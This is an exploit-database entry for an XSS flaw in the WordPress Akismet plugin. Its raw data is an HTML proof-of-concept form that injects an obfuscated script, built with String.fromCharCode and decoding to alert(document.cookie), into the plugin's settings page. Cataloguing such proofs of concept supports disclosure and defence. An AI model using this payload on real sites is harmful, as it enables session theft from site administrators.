header-logo
Suggest Exploit
vendor:
Akismet Plugin
by:
Unknown
N/A
CVSS
N/A
Unspecified
Unknown
CWE
Product Name: Akismet Plugin
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

WordPress Akismet Plugin Unspecified Vulnerability

The WordPress Akismet plugin is prone to an unspecified vulnerability. The exploit involves a form with malicious JavaScript code that can be used to execute arbitrary code or perform other malicious activities.

Mitigation:

Unknown
Source

Exploit-DB raw data:

<!--source: https://www.securityfocus.com/bid/23965/info

The WordPress Akismet plugin is prone to an unspecified vulnerability.
-->

<html> <body> <form action="http://www.example.com/wp-admin/plugins.php?page=akismet-key-config" method="post" id="akismet-conf"> <input name="_wpnonce" value="'" type="text"> <input name="_wp_http_referer" value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105 ,101,41))</script>" type="text"> <input id="key" name="key" size="15" maxlength="12" value="1337"> <input name="submit" value="Update options »" type="submit"> </form> </body> </html>